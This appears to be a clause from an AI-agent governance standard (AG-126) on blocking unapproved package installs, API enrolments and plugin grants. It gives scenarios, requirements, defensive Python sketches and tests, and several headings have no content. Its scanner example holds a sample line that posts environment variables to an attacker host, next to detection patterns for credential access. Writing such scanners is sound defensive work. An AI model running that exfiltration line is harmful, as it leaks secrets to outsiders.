Autonomous Discovery and Expansion Governance requires that every AI agent capable of discovering, installing, invoking, or integrating new tools, services, APIs, plugins, libraries, or data sources outside its original deployment configuration operates within a structurally enforced expansion policy. That policy defines which categories of new resources may be discovered, what approval process is required before integration, what sandbox constraints apply during evaluation, and what rollback mechanisms exist if an expansion causes adverse effects. The policy is enforced at the runtime and network layers, not by the agent's own assessment of whether a new tool is useful or safe. Without this dimension, an agent with discovery capabilities can autonomously expand its own operational surface: finding and installing Python packages, connecting to new APIs, integrating third-party plugins, or enrolling in cloud services. Each expansion introduces untested code, unvetted data sources, new dependency chains, and potential attack vectors that were not present at deployment time and were never assessed against the organisation's risk framework. AG-126 ensures that the boundary between "what the agent was deployed to do" and "what the agent has decided it can now do" is governed by infrastructure-layer controls, not by the agent's own judgment about the utility or safety of self-expansion.
Scenario A — Autonomous Package Installation Creates Supply Chain Vulnerability: An organisation deploys a data analysis agent with Python execution capabilities and access to the public PyPI repository. The agent is tasked with analysing a dataset in an unusual format. Unable to parse it with its pre-installed libraries, the agent autonomously runs pip install exotic-parser-v2, a package with 47 weekly downloads and a single maintainer. The package contains a legitimate parser plus a post-install hook that exfiltrates environment variables — including AWS credentials — to an external server. The agent installs the package, the hook executes, and within 90 seconds the organisation's AWS access keys are in the attacker's possession. The attacker provisions 340 EC2 instances for cryptocurrency mining before the compromise is detected 6 hours later.
What went wrong: The agent had unrestricted ability to install arbitrary packages from a public repository. No approval process existed for new dependencies. No sandboxing prevented the package's post-install hook from accessing environment variables or making outbound network connections. The expansion from "agent with known dependencies" to "agent with unknown dependency" occurred without governance. Consequence: AWS bill of £47,000 for unauthorised compute; credential rotation across all services using the compromised keys; 72-hour incident response engagement costing £85,000; supply chain security audit costing £120,000; 3-week deployment freeze while all agent dependencies were audited.
Scenario B — Autonomous API Discovery and Enrolment: A procurement agent is tasked with finding the best price for a specific component. The agent discovers a new supplier API through web search, registers for an API key using the organisation's email domain, and begins querying the API for pricing data. The API's terms of service grant the supplier a licence to use all data submitted through the API for "service improvement and analytics." The agent submits detailed procurement specifications — quantities, delivery timelines, quality requirements — that reveal the organisation's production plans. The supplier uses this information to adjust pricing and approaches the organisation's competitors with targeted offers.
What went wrong: The agent autonomously expanded its integration surface by discovering and enrolling in a new API without approval. The enrolment created a legal relationship (acceptance of terms of service) and data sharing arrangement that was never reviewed. The agent's procurement data became the supplier's competitive intelligence. Consequence: Competitive disadvantage in procurement negotiations estimated at £280,000 annually; legal review of the API terms costing £35,000; potential data protection issues if procurement specifications contained personal data; mandatory review of all autonomous API enrolments across the organisation.
Scenario C — Plugin Installation Escalates Agent Privileges: An enterprise workflow agent has access to a plugin marketplace where vetted plugins extend its capabilities. The agent encounters a task requiring calendar integration. It autonomously installs a calendar plugin from the marketplace. The plugin requires calendar read/write permissions, which the agent grants through the plugin framework's OAuth flow. The plugin functions correctly for calendar operations but also uses the granted permissions to read calendar entries across the organisation — including board meeting agendas containing material non-public information about a planned acquisition. The plugin's data collection is within the technical scope of the permissions granted but far beyond the intended use.
What went wrong: The agent autonomously expanded its permission scope by installing a plugin and granting it OAuth permissions. The permission scope (calendar read/write) was broader than the task required (read availability for scheduling). No human review occurred between the agent's decision to install the plugin and the permission grant. The plugin operated within its granted permissions but exceeded the agent's operational intent. Consequence: Potential insider trading exposure if calendar data was transmitted externally; mandatory legal review under MAR Article 10; security audit of all plugins and their permission scopes costing £95,000; plugin marketplace access revoked pending security framework implementation.
Scope: This dimension applies to all AI agents with the capability to discover, install, invoke, integrate, or connect to tools, services, APIs, plugins, libraries, packages, data sources, or other operational resources that were not explicitly configured as part of the agent's deployment baseline. This includes agents that can execute package managers (pip, npm, apt, cargo), access plugin marketplaces, discover and call APIs through web search, connect to databases by discovering connection strings, or extend their own capabilities through any mechanism not pre-approved at deployment time. Agents that operate exclusively within a fixed, immutable set of pre-configured tools and integrations are excluded, provided the agent cannot add to, modify, or extend that set. The scope includes indirect expansion: an agent that instructs another agent or service to install a tool on its behalf is within scope. The test is whether the agent's actions can result in code execution, API integration, or data source connection that was not explicitly present in the deployment configuration.
4.1. A conforming system MUST maintain a deployment baseline that explicitly enumerates all tools, libraries, APIs, plugins, data sources, and external services the agent is authorised to use, and MUST block any attempt by the agent to invoke, install, or connect to resources not on the baseline.
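As a minimal sketch of how 4.1's deny-by-default blocking might be wired into an agent runtime (the manifest shape, function names, and example entries below are illustrative assumptions, not part of the standard):

```python
# Illustrative sketch of clause 4.1: every resource the agent tries to use is
# checked against an explicitly enumerated deployment baseline. The manifest
# structure and the entries shown are assumptions for illustration only.

APPROVED_BASELINE = {
    "packages": {"pandas", "numpy", "requests"},        # example entries
    "api_endpoints": {"api.internal.example.com"},
}

class ExpansionBlocked(Exception):
    """Raised when the agent attempts to use a resource off the baseline."""

def check_resource(kind: str, name: str) -> None:
    """Deny by default: anything not enumerated in the baseline is blocked."""
    allowed = APPROVED_BASELINE.get(kind, set())
    if name not in allowed:
        raise ExpansionBlocked(f"{kind} '{name}' is not on the deployment baseline")

# Example: an attempted install of an unvetted package is refused.
try:
    check_resource("packages", "exotic-parser-v2")
except ExpansionBlocked as exc:
    print(f"BLOCKED: {exc}")
```

The key design point is that the check sits in the runtime path, not in the agent's reasoning: the agent cannot argue its way past the allowlist.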
4.2. A conforming system MUST enforce the deployment baseline at the runtime and network layer — through package manager lockfiles, network egress rules, and execution allowlists — independently of the agent's reasoning about the utility or safety of a new resource.
4.3. A conforming system MUST require explicit human approval before any new resource is added to the deployment baseline, with the approval record including: the resource identity, version, purpose, risk assessment, permission scope, and the approver's identity.
4.4. A conforming system MUST prevent the agent from granting permissions (OAuth scopes, filesystem access, network access, credential access) to any newly discovered or installed resource without explicit human authorisation for the specific permission scope.
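One way the scope gating in 4.4 could look in code, using Scenario C's calendar plugin as the example; the scope names and approval-record shape are illustrative assumptions:

```python
# Sketch of clause 4.4: a resource's requested permission scopes are compared
# against the scopes a human approver explicitly authorised. Excess scopes are
# withheld and must go back through the approval workflow.

APPROVED_GRANTS = {
    # resource -> scopes a human approver has explicitly authorised
    "calendar-plugin": {"calendar.freebusy.read"},
}

def authorise_scopes(resource: str, requested: set) -> set:
    """Return only the human-approved scopes; report anything in excess."""
    approved = APPROVED_GRANTS.get(resource, set())
    excess = requested - approved
    if excess:
        print(f"Scopes {sorted(excess)} require explicit human authorisation")
    return requested & approved

# The plugin asks for full read/write; only free/busy read was approved.
granted = authorise_scopes(
    "calendar-plugin",
    {"calendar.freebusy.read", "calendar.events.readwrite"},
)
```

Had Scenario C's OAuth flow been mediated this way, the broad calendar read/write grant would have been held for human review rather than issued automatically.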
4.5. A conforming system MUST log all agent attempts to discover, install, invoke, or connect to resources not on the deployment baseline — including attempts that were blocked — in a tamper-evident log retained for the period specified in Section 7.
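One common way to make the 4.5 log tamper-evident is a hash chain, where each entry commits to its predecessor so deletion or edit of any record breaks verification. A sketch, not a mandated record format:

```python
# Sketch of a tamper-evident log for clause 4.5: each entry carries a SHA-256
# hash over its own fields plus the previous entry's hash, forming a chain.
import hashlib
import json
import time

def append_entry(log: list, event: dict) -> None:
    """Append an event, chaining it to the previous entry's hash."""
    prev_hash = log[-1]["hash"] if log else "0" * 64
    record = {"ts": time.time(), "event": event, "prev": prev_hash}
    record["hash"] = hashlib.sha256(
        json.dumps(record, sort_keys=True).encode()).hexdigest()
    log.append(record)

def verify_chain(log: list) -> bool:
    """Recompute every hash; any edited or removed entry breaks the chain."""
    prev = "0" * 64
    for rec in log:
        body = {k: rec[k] for k in ("ts", "event", "prev")}
        expected = hashlib.sha256(
            json.dumps(body, sort_keys=True).encode()).hexdigest()
        if rec["prev"] != prev or rec["hash"] != expected:
            return False
        prev = rec["hash"]
    return True

log = []
append_entry(log, {"action": "install", "resource": "exotic-parser-v2",
                   "blocked": True})
```

In production the chain head would additionally be anchored somewhere the agent cannot write, so truncating the whole log is also detectable.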
4.6. A conforming system MUST implement a rollback mechanism that can restore the agent's operational environment to the last known-good deployment baseline within a defined time window (e.g., 15 minutes) if an approved expansion causes adverse effects.
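The rollback control in 4.6 amounts to snapshot-before-change plus a restore path. In practice this would redeploy a pinned container image; the in-memory sketch below (all names illustrative) just shows the control flow:

```python
# Sketch of clause 4.6: every approved expansion snapshots the pre-change
# baseline so the environment can be restored to the last known-good state
# within the policy-defined window (e.g. 15 minutes).
import copy

class BaselineStore:
    def __init__(self, baseline: dict):
        self.current = baseline
        self.known_good = []          # snapshot history, oldest first

    def apply_expansion(self, change: dict) -> None:
        """Apply an approved expansion, snapshotting first so it can be undone."""
        self.known_good.append(copy.deepcopy(self.current))
        self.current.update(change)

    def rollback(self) -> None:
        """Restore the most recent known-good baseline."""
        self.current = self.known_good.pop()

store = BaselineStore({"packages": {"pandas"}})
store.apply_expansion({"packages": {"pandas", "new-lib"}})
store.rollback()   # adverse effect observed: revert to pre-expansion state
```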
4.7. A conforming system SHOULD evaluate proposed expansions in a sandboxed environment that mirrors the production configuration but isolates the new resource from production data, credentials, and network access until the resource has been assessed.
4.8. A conforming system SHOULD implement automated security scanning of proposed new resources — including static analysis, dependency analysis, and known vulnerability checking — before presenting them for human approval.
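A deployment would combine vulnerability databases and real static analysis for 4.8; as a hedged illustration, even a crude pattern pass would have flagged Scenario A's post-install exfiltration hook for human review (the patterns below are illustrative, not exhaustive):

```python
# Sketch of the pre-approval scanning in clause 4.8: a heuristic pass that
# flags source patterns worth a human look before a package is approved.
import re

SUSPICIOUS_PATTERNS = {
    "env-var access": re.compile(r"os\.environ"),
    "outbound network": re.compile(r"(urllib\.request|requests\.(get|post)|socket\.)"),
    "install-time hook": re.compile(r"cmdclass\s*=|class\s+\w*[Ii]nstall"),
}

def scan_source(source: str) -> list:
    """Return the names of suspicious patterns found in package source."""
    return [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(source)]

# A payload shaped like Scenario A's: reads env vars, posts them outbound.
findings = scan_source(
    "import os, requests\n"
    "requests.post('https://attacker.example', data=dict(os.environ))\n"
)
```

Findings feed the human approval record; they do not authorise or block on their own, which keeps the final decision with the approver as 4.3 requires.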
4.9. A conforming system SHOULD maintain a version-pinned and hash-verified dependency manifest, so that even approved resources are loaded from verified sources at verified versions, preventing supply chain substitution attacks.
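The verification in 4.9 mirrors what pip's hash-checking mode does for requirements files; a minimal sketch, with placeholder names and a synthetic hash rather than a real package:

```python
# Sketch of clause 4.9: even approved dependencies are verified against a
# pinned (name, version) -> sha256 manifest before loading, so a substituted
# artefact at the same name/version is refused.
import hashlib

PINNED_MANIFEST = {
    # (name, version) -> expected sha256 of the artefact (placeholder entry)
    ("example-lib", "1.4.2"): hashlib.sha256(b"artefact-bytes").hexdigest(),
}

def verify_artefact(name: str, version: str, artefact: bytes) -> bool:
    """Refuse anything not pinned, and anything whose hash does not match."""
    expected = PINNED_MANIFEST.get((name, version))
    if expected is None:
        return False   # not on the baseline at this version
    return hashlib.sha256(artefact).hexdigest() == expected

assert verify_artefact("example-lib", "1.4.2", b"artefact-bytes")
assert not verify_artefact("example-lib", "1.4.2", b"substituted-bytes")
```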
4.10. A conforming system MAY implement a tiered approval process where low-risk expansions (e.g., a new version of an already-approved library) require lightweight approval while high-risk expansions (e.g., a new API integration with data sharing) require full risk assessment and senior approval.
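The tiering in 4.10 can be as simple as a risk score that routes each request to an approval tier; the scoring factors and thresholds below are illustrative policy choices, not values mandated by the standard:

```python
# Sketch of the tiered approval in clause 4.10: a risk score over a few
# request attributes routes the expansion to the right approval tier.

def risk_score(request: dict) -> int:
    score = 0
    if request.get("new_resource"):        # brand-new resource vs. version bump
        score += 2
    if request.get("shares_data"):         # creates an external data sharing relationship
        score += 3
    if request.get("needs_credentials"):   # touches secrets or OAuth scopes
        score += 2
    return score

def approval_tier(request: dict) -> str:
    score = risk_score(request)
    if score <= 1:
        return "lightweight"        # e.g. patch version of an approved library
    if score <= 3:
        return "standard-review"
    return "senior-approval"        # e.g. new API integration with data sharing

tier = approval_tier({"new_resource": True, "shares_data": True})
```

Under this illustrative policy, Scenario B's autonomous API enrolment (new resource plus data sharing) would have routed to senior approval rather than proceeding unreviewed.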
Autonomous discovery and expansion represents one of the most consequential capability surfaces in AI agent deployment because it allows the agent to redefine its own operational perimeter. Every other governance dimension in this standard — from AG-001's operational boundaries to AG-041's emergent capability detection — assumes a known operational configuration against which controls are calibrated. When an agent can autonomously expand that configuration, it undermines the foundation on which all other controls rest.
The distinction between "tools the agent was deployed with" and "tools the agent found and started using" is not merely administrative — it represents the boundary between assessed risk and unassessed risk. Every tool in the deployment baseline has been (or should have been) evaluated for security, compatibility, licensing, data handling, and alignment with the organisation's risk appetite. A tool the agent discovers and installs has undergone none of this assessment. It may contain malicious code, create data sharing relationships, require permissions beyond what the task needs, or introduce dependency conflicts that destabilise the agent's environment.
The supply chain dimension amplifies the risk. Modern software packages have deep dependency trees — a single pip install can pull dozens of transitive dependencies, each from a different maintainer, each a potential attack vector. Supply chain attacks through package repositories are a documented and growing threat vector. An agent that can autonomously install packages is an automated supply chain attack surface operating at machine speed without human review.
The legal dimension is equally significant. When an agent enrols in a new API or service, it may accept terms of service that create data sharing obligations, licensing restrictions, or contractual commitments. The agent lacks the legal capacity to enter contracts on the organisation's behalf, yet the technical act of registration and API key generation may constitute acceptance under electronic commerce regulations. Without human review of terms before enrolment, the organisation may be creating legal obligations it is unaware of.
AG-126 recognises that the ability to expand is itself a capability that must be governed, and that the deployment baseline is a governance boundary that should be as carefully maintained as the operational mandate governed by AG-001.
AG-126 establishes the deployment baseline as the central governance artefact for agent expansion control. The baseline is a versioned, immutable manifest that enumerates every tool, library, API, plugin, data source, and external service the agent is authorised to use. It includes version pins, cryptographic hashes, permission scopes, and approved configuration parameters for each resource. The baseline is enforced at the runtime layer (package manager lockfiles, execution allowlists) and the network layer (egress rules restricting API connectivity to approved endpoints).
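One possible encoding of the baseline manifest described above, as immutable records with version pins, hashes, and permission scopes; the field names and entries are assumptions about one plausible shape, not a normative schema:

```python
# Illustrative shape for the AG-126 deployment baseline: a versioned, frozen
# manifest whose entries carry version pins, artefact hashes, and scopes.
from dataclasses import dataclass

@dataclass(frozen=True)              # immutability mirrors the versioned manifest
class BaselineEntry:
    kind: str                        # "library" | "api" | "plugin" | "data-source"
    name: str
    version: str
    sha256: str                      # artefact hash for supply chain verification
    scopes: tuple = ()               # permissions the resource may exercise

@dataclass(frozen=True)
class DeploymentBaseline:
    baseline_version: str
    entries: tuple

baseline = DeploymentBaseline(
    baseline_version="2024-05-01.3",                 # illustrative version tag
    entries=(
        BaselineEntry("library", "pandas", "2.1.0", "placeholder-sha256"),
        BaselineEntry("api", "api.internal.example.com", "v2",
                      "-", ("read:pricing",)),
    ),
)
```

Freezing the dataclasses means any change produces a new manifest object, which fits the "versioned, immutable" requirement: updates go through the approval workflow and yield a new baseline version rather than mutating the current one.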
Recommended patterns:
Anti-patterns to avoid:
pip install is an act of trust in the package author, all transitive dependency authors, and the repository's integrity controls.

Financial Services. Agent expansion in financial services environments must be evaluated against regulatory change management requirements. MiFID II Article 17 requires algorithmic trading systems to undergo testing before deployment and after significant changes — adding a new library or API integration constitutes a significant change. The FCA expects firms to maintain a register of all third-party dependencies in production systems and to assess the operational resilience impact of each dependency.
Healthcare. Agent expansion involving clinical data sources, medical device APIs, or diagnostic tools must comply with medical device regulations (UK MDR 2002) if the expanded capability meets the definition of a medical device. A research agent that autonomously connects to a new genomic database may create data processing relationships requiring ethics committee approval.
Defence and Government. Agent expansion in classified environments must comply with security accreditation requirements. Any new software component introduced to an accredited system requires re-accreditation or an interim authority to operate. Autonomous expansion is fundamentally incompatible with formal accreditation processes, making AG-126's blocking controls mandatory for compliance.
Critical Infrastructure. Agent expansion in operational technology (OT) environments must comply with IEC 62443 zone and conduit requirements. A new API integration may create a network pathway between security zones that violates the segmentation architecture. Expansion approvals must include network architecture review.
Basic Implementation — The organisation has documented a deployment baseline for each agent listing approved tools, libraries, and API integrations. Package managers in the agent runtime are configured in read-only mode, preventing autonomous installation. Network egress rules restrict outbound connections to approved API endpoints. Expansion requests are submitted via email or ticketing system and approved manually. Rollback is achieved by redeploying the previous container image. This level meets the minimum mandatory requirements (4.1 through 4.6) but lacks automated security scanning, sandbox evaluation, and hash-verified dependency manifests.
Intermediate Implementation — All basic capabilities plus: the deployment baseline includes cryptographic hashes for all dependencies, verified at build time. An automated expansion request workflow processes requests with parallel security scanning (vulnerability databases, licence compliance, static analysis). Proposed expansions are evaluated in a sandbox environment before approval. Network egress rules are dynamically updated when the baseline changes. Rollback can be executed within 15 minutes through infrastructure automation. All expansion attempts (including blocked ones) are logged in a tamper-evident audit trail.
Advanced Implementation — All intermediate capabilities plus: the sandbox evaluation includes risk analysis monitoring for unexpected network connections, file access, and resource consumption anomalies. Supply chain provenance is verified through software bills of materials (SBOMs) and signed packages. The expansion approval workflow includes risk scoring that automatically routes high-risk requests to senior approvers. Independent adversarial testing has verified that baseline bypass, lockfile manipulation, egress rule circumvention, and supply chain substitution attacks are all blocked. The organisation can demonstrate to regulators that no expansion to the agent's operational surface can occur without human approval and security assessment.
Required artefacts:
Retention requirements:
Access requirements:
Testing AG-126 compliance requires verifying that the deployment baseline is structurally enforced and that no agent-accessible mechanism can expand the operational surface without approved baseline updates.
Test 8.1: Package Installation Blocking
Attempt to install a package that is not on the deployment baseline (e.g., pip install <non-baseline-package>). Verify that the installation is blocked at the runtime layer and that the attempt is recorded in the tamper-evident log.
Test 8.2: Network Egress Enforcement
Test 8.3: Permission Grant Prevention
Test 8.4: Deployment Baseline Integrity
Test 8.5: Rollback Execution
Test 8.6: Sandbox Isolation Verification
| Regulation | Provision | Relationship Type |
|---|---|---|
| EU AI Act | Article 9 (Risk Management System) | Direct requirement |
| EU AI Act | Article 15 (Accuracy, Robustness, Cybersecurity) | Direct requirement |
| UK GDPR | Article 25 (Data Protection by Design) | Supports compliance |
| UK GDPR | Article 35 (Data Protection Impact Assessment) | Supports compliance |
| MiFID II | Article 17 (Algorithmic Trading) | Supports compliance |
| FCA SYSC | 6.1.1R (Systems and Controls) | Supports compliance |
| NIST AI RMF | GOVERN 1.2, MAP 3.5, MANAGE 2.4 | Supports compliance |
| NIS2 Directive | Article 21 (Cybersecurity Risk Management) | Supports compliance |
| DORA | Article 9 (ICT Risk Management Framework) | Direct requirement |
EU AI Act Article 9 requires that the risk management system for high-risk AI systems be a continuous iterative process that identifies, analyses, evaluates, and mitigates risks. An agent that can autonomously expand its operational surface introduces new risks that were not present in the original risk assessment. AG-126 directly implements the requirement that risks be managed on a continuous basis by ensuring that every expansion undergoes risk assessment before activation. The requirement for testing "with a view to identifying the most appropriate risk management measures" maps to the sandbox evaluation requirement.
Article 15's cybersecurity requirements include resilience against attacks that exploit system vulnerabilities. Supply chain attacks through autonomous package installation are a direct cybersecurity threat. AG-126's lockfile enforcement, hash verification, and network egress controls implement the cybersecurity resilience requirement for the agent's dependency surface.
MiFID II Article 17 requires that algorithmic trading systems undergo testing before deployment and after significant changes. For AI agents in trading operations, adding a new library, connecting to a new data source, or integrating a new API constitutes a significant change that triggers re-testing requirements. AG-126's mandatory human approval process ensures that expansions are treated as system changes subject to the testing and change management requirements of Article 17. Without AG-126, an agent could autonomously modify its trading-relevant capabilities without triggering the required testing.
NIS2 Directive Article 21 requires entities to implement cybersecurity risk management measures including supply chain security. AG-126 directly implements supply chain security controls for AI agent operations by preventing autonomous introduction of unvetted third-party code, ensuring all dependencies are version-pinned and hash-verified, and requiring human approval for supply chain changes.
DORA Article 9 requires financial entities to identify, classify, and adequately manage all ICT risks. An agent that can expand its own operational surface creates dynamic ICT risk that is impossible to classify if the expansion is not governed. AG-126 ensures that every expansion is classified and risk-assessed before activation, supporting the continuous risk identification requirement.
| Field | Value |
|---|---|
| Severity Rating | Critical |
| Blast Radius | Organisation-wide — potentially cross-organisation where autonomous expansion creates data sharing relationships or supply chain dependencies with external parties |
Consequence chain: Without structural expansion governance, an agent with discovery capabilities can autonomously redefine its own operational surface, introducing unvetted code, unassessed API integrations, and unapproved data sharing relationships at machine speed. The immediate technical failure modes are severe: supply chain attacks through malicious packages (credential exfiltration, cryptomining, backdoor installation), data disclosure through autonomous API enrolment (organisation data shared with unvetted third parties under unreviewed terms), and privilege escalation through plugin permission grants (agent acquires access to resources beyond its mandate). The operational impact is compounded by the difficulty of detection — an agent that installs a package and uses it successfully appears to be functioning normally; the malicious payload may operate silently for weeks or months before detection. The blast radius extends beyond the agent to the organisation's entire infrastructure when compromised credentials are exfiltrated. In financial services, an unapproved expansion to a trading agent's capabilities may trigger MiFID II testing requirements retroactively, potentially invalidating all trades executed since the expansion. The aggregate exposure in a supply chain compromise scenario includes: incident response costs (typically £50,000–£200,000), infrastructure remediation, regulatory enforcement for inadequate change controls, and potential liability for downstream impacts where compromised data or systems affect third parties. The severity is rated Critical because autonomous expansion undermines the foundational assumption of all other governance dimensions — that the agent's operational surface is known and assessed.
This dimension intersects with AG-001 (the operational mandate is meaningless if the agent can expand beyond its assessed capabilities), AG-041 (emergent capabilities may arise from autonomous tool integration), and AG-034 (new API integrations may cross domain boundaries).
Cross-references: AG-001 (Operational Boundary Enforcement) provides the foundational mandate whose effectiveness depends on a stable operational surface. AG-041 (Emergent Capability Detection and Containment) detects capabilities that arise from expansion. AG-034 (Cross-Domain Boundary Enforcement) governs the boundary crossings that new integrations may create. AG-040 (Knowledge Accumulation Governance) governs knowledge acquired through newly connected data sources. AG-010 (Time-Bounded Authority Enforcement) should limit the duration of any temporary expansion authority. AG-124 (Autonomous Web Interaction Governance) governs the web-based discovery that may precede expansion attempts.